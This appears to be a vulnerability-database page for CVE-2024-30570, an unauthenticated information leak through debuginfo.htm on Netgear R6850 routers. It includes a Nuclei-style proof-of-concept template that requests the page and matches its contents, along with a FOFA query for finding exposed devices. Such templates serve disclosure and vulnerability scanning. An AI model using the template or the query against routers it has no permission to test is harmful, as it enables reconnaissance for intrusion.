CVE-2024-30570: Netgear R6850 - Information Disclosure

2025-08-01 Netgear R6850 PoC Public

Description

Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the debuginfo.htm page. This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as product model name, WAN connection type, and potentially other system details.

PoC

id: CVE-2024-30570

info:
  name: Netgear R6850 - Information Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the debuginfo.htm page. This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as product model name, WAN connection type, and potentially other system details.
  impact: |
    Attackers can obtain sensitive information from the router, potentially aiding further attacks.
  remediation: |
    Update Netgear R6850 firmware to a version that patches the information disclosure vulnerability.
  reference:
    - https://github.com/funny-mud-peee/IoT-vuls/blob/main/netgear%20R6850/Info%20Leak%20in%20Netgear-R6850%EF%BC%88debuginfo.htm%EF%BC%89.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30570
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-30570
    cwe-id: CWE-200
    epss-score: 0.01221
    epss-percentile: 0.67168
  metadata:
    verified: true
    max-request: 1
    product: Netgear R6850 Router
    vendor: Netgear
    version: V1.1.0.88
    fofa-query: app="NETGEAR" && "R6850"
  tags: cve,cve2024,netgear,router,exposure,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/debuginfo.htm"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<br>WAN connection type"

      - type: status
        status:
          - 200
# digest: 490a0046304402200265d2719b72daf47f100a579005ce5fd0d5e4dc38045d5fc35d661f29f9552502203bbf9d19407cdc83a920f3c13e675ab3c3911a00d68eb0a7d5f2f7a9a50848fd:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities